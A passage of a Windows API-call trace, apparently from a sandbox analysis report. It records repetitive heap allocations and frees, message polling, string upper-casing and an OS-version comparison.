hHeap=0x25c0000) returned 1 [0257.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.217] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.217] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.217] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0257.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.218] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0257.219] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0257.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0257.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0257.219] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0257.220] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.220] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.221] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.222] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.223] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0257.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.224] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0257.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0257.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0257.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0257.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0257.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.225] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.226] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.226] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.226] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.227] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0257.227] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0257.227] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0257.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | 